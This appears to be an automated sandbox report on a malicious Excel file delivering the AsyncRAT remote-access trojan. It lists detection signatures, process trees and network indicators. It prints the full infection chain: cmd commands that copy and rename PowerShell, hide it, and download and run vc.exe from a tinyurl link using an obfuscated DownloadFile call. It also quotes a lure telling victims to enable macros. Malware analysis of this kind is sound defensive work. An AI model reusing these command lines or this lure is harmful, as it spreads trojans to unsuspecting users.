
Analysis Report 1099008FEDEX_090887766.xls

Overview

General Information

Sample Name: 1099008FEDEX_090887766.xls
Analysis ID: 320331
MD5: 069451376c805d4b4d21fdc34a5e58ba
SHA1: 5e8897fa3ee53ac8a1f010e01ea4ec5c2b3dbed5
SHA256: dc2be755822676a5ec7e406876c100efaf4983272e57a52469d5f0f788f55b82
Tags: AsyncRAT, RAT, xls

Detection

Hidden Macro 4.0 AsyncRAT
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected AsyncRAT
Binary contains a suspicious time stamp
Connects to a URL shortener service
Document exploit detected (process start blacklist hit)
Drops PE files to the document folder of the user
Found Excel 4.0 Macro with suspicious formulas
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6844 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 7120 cmdline: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Robocopy.exe (PID: 5776 cmdline: robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z MD5: BB8F54AE10FDA174289A4A495809EB69)
    • cmd.exe (PID: 7140 cmdline: cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5568 cmdline: timeout /t 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • cmd.exe (PID: 7156 cmdline: cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4880 cmdline: cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe') MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • o.exe (PID: 6036 cmdline: C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe') MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 1708 cmdline: cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • o.exe (PID: 5728 cmdline: C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 6260 cmdline: cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe; MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • o.exe (PID: 1560 cmdline: C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • vc.exe (PID: 4896 cmdline: C:\Users\user\AppData\Roaming\vc.exe MD5: BB7C0DFD8ECC7EEBCE937A232608695F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: 1099008FEDEX_090887766.xls
Rule: SUSP_Excel4Macro_AutoOpen
Description: Detects Excel4 macro use with auto open / close
Author: John Lambert @JohnLaTwC
Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x10bc2:$s1: Excel
  • 0x32b0:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

Source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp
Rule: JoeSecurity_AsyncRAT
Description: Yara detected AsyncRAT
Author: Joe Security

Source: Process Memory Space: vc.exe PID: 4896
Rule: JoeSecurity_AsyncRAT
Description: Yara detected AsyncRAT
Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis
Data: Command: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit, CommandLine: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6844, ProcessCommandLine: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit, ProcessId: 7120

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: 1099008FEDEX_090887766.xls; ReversingLabs: Detection: 14%
Source: C:\Users\user\AppData\Local\Temp\o.exe; Code function: 14_2_0125C197 malloc,ExpandEnvironmentStringsW,FindFirstFileW,FindClose,free,14_2_0125C197
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\powershell.exe

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\cmd.exe
Source: global traffic; DNS query: name: tinyurl.com
Source: global traffic; TCP traffic: 192.168.2.3:49733 -> 104.20.138.65:443

Networking:

Connects to a URL shortener service
Source: unknown; DNS query: name: tinyurl.com
Source: Joe Sandbox View; IP Address: 162.159.129.233
Source: Joe Sandbox View; IP Address: 104.20.138.65
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown; DNS traffic detected: queries for: tinyurl.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://onedrive.live.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://outlook.office.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://outlook.office365.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: o.exe, 0000000E.00000002.397281836.00000000055A8000.00000004.00000001.sdmp, o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://settings.outlook.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://store.office.com/addinstemplate
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://tasks.office.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://templatelogging.office.com/client/log
      Source: o.exe, 0000000E.00000002.396745750.0000000005507000.00000004.00000001.sdmpString found in binary or memory: https://tinyurl.com
      Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmpString found in binary or memory: https://tinyurl.com/y3m5fwhq
      Source: o.exe, 0000000E.00000002.396745750.0000000005507000.00000004.00000001.sdmpString found in binary or memory: https://tinyurl.com4
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://wus2-000.contentsync.
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.drString found in binary or memory: https://www.digicert.com/CPS0
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT
Source: Yara match | File source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vc.exe PID: 4896, type: MEMORY

      System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content"
Source: Document image extraction number: 1 | Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1 | Screenshot OCR: Enable Content"
Found Excel 4.0 Macro with suspicious formulas
Source: 1099008FEDEX_090887766.xls | Initial sample: EXEC
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_01258D90
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_01258C90
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_01257732
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_012590D0
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_0337E830
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 17_2_00EBCE60
Source: C:\Users\user\AppData\Roaming\vc.exe | Code function: 32_2_02ACE4A0
Source: C:\Users\user\AppData\Roaming\vc.exe | Code function: 32_2_02ACE4B0
Source: C:\Users\user\AppData\Roaming\vc.exe | Code function: 32_2_02ACC53C
Source: C:\Users\user\AppData\Roaming\vc.exe | Code function: 32_2_07232E61
Source: C:\Users\user\AppData\Roaming\vc.exe | Code function: 32_2_07232E70
Source: 1099008FEDEX_090887766.xls | OLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\Robocopy.exe | Process token adjusted: Security
Source: powershell.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Roaming\vc.exe | Section loaded: amsidll.dll
Source: 1099008FEDEX_090887766.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: vc.exe.14.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vc.exe.14.dr, u0006/u0006.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 32.2.vc.exe.780000.0.unpack, u0006/u0006.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 32.0.vc.exe.780000.0.unpack, u0006/u0006.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal96.troj.expl.evad.winXLS@31/25@2/2
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_012590D0 FormatMessageW,LocalFree,GetLastError,FormatMessageW,free,LocalFree,free,free
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_0125C231 __EH_prolog3_GS,CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_0125D547 FindResourceExW,LoadResource
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3564:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{FE3D55F8-EE7F-4F13-A134-D11201796DC7} - OProcSessId.dat
Source: 1099008FEDEX_090887766.xls | OLE indicator, Workbook stream: true
Source: C:\Users\user\AppData\Local\Temp\o.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\vc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\Robocopy.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\o.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: 1099008FEDEX_090887766.xls | ReversingLabs: Detection: 14%
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: unknown | Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: C:\Users\user\AppData\Local\Temp\o.exe | Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe
Source: C:\Users\user\AppData\Local\Temp\o.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\o.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
      Source: Binary string: powershell.pdbUGP source: o.exe, 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, o.exe, 00000010.00000002.390755683.0000000001251000.00000020.00020000.sdmp, o.exe, 00000011.00000000.252577603.0000000001251000.00000020.00020000.sdmp, powershell.exe.7.dr
      Source: Binary string: powershell.pdb source: o.exe, 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, o.exe, 00000010.00000002.390755683.0000000001251000.00000020.00020000.sdmp, o.exe, 00000011.00000000.252577603.0000000001251000.00000020.00020000.sdmp, powershell.exe.7.dr

      Data Obfuscation:

Binary contains a suspicious time stamp
Source: initial sample | Static PE information: 0x9203324E [Sat Aug 17 19:30:22 2047 UTC]
Obfuscated command line found
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_0125A58B push ecx; ret 14_2_0125A59E
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_0125A239 push ecx; ret 14_2_0125A24C
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_0337BE60 push es; ret 14_2_0337BE76
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_0337BEA0 push es; ret 14_2_0337BEB6
